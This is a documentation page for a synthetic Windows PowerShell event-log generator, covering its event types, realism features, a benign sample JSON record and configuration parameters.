Windows PowerShell
PowerShell classic and operational channels — engine lifecycle, script block logging, module invocations, pipeline execution, and provider starts. Includes obfuscated command detection and suspicious script patterns.
Quick Start
uv tool install eventum-generator
git clone https://github.com/eventum-generator/content-packs.git
cd content-packs
eventum generate \
--path generators/windows-powershell/generator.yml \
--id pslog \
--live-mode trueEvent Types
| Event ID | Description | Frequency | Category |
|---|---|---|---|
| 4104 | Script Block Logging | ~30% | process |
| 4103 | Module Logging — cmdlet invocation | ~30% | process |
| 400 | Engine State → Available | ~8% | process |
| 403 | Engine State → Stopped | ~8% | process |
| 600 | Provider Started | ~8% | process |
| 800 | Pipeline Execution Details | ~8% | process |
| 4105 | Script Block Invocation Start | ~4% | process |
| 4106 | Script Block Invocation Stop | ~4% | process |
Realism Features
- Session correlation — Engine start (400) produces sessions consumed by engine stop (403)
- Script block correlation — 4104 produces block IDs referenced by 4105/4106 invocation events
- ~15% of script blocks flagged as warning level (encoded commands, reflection APIs, crypto)
- 30 cmdlets with realistic frequency weights (Get-Process, Get-Service dominate)
- Host application variety — powershell.exe (55%), pwsh.exe (20%), PSRemoting (15%), ISE (10%)
- 120-host fleet with per-host record IDs and correlation pools
Sample Output
{
"@timestamp": "2026-02-22T17:04:03+00:00",
"event": {
"category": ["process"],
"code": "4104",
"kind": "event",
"module": "powershell",
"provider": "Microsoft-Windows-PowerShell"
},
"powershell": {
"file": {
"script_block_id": "948808fd-...",
"script_block_text": "Restart-Service -Name Spooler -Force"
}
},
"user": { "domain": "CONTOSO", "name": "mjohnson" },
"winlog": {
"channel": "Microsoft-Windows-PowerShell/Operational",
"event_id": "4104"
}
}Parameters
| Parameter | Default | Description |
|---|---|---|
| domain | CONTOSO | Active Directory domain name |
| fqdn_suffix | contoso.local | FQDN suffix |
| domain_sid | S-1-5-21-3457937927-... | Domain SID prefix |
| agent_version | 8.17.0 | Winlogbeat version |
Related Generators
Windows Security Event Log
The Security channel of Windows Event Log — logon/logoff sessions, process creation, privilege escalation, account management, and audit policy changes from a 120-host Active Directory fleet.
Windows Sysmon
Sysmon (System Monitor) operational channel — process creation with full command lines, network connections, file creates, registry modifications, DNS queries, and WMI events. SwiftOnSecurity-style tuning.
Linux Auditd
Linux audit framework (auditd) — syscall tracing (execve, openat, connect), PAM authentication, credential changes, user login/logout, sudo privilege escalation, and systemd service management.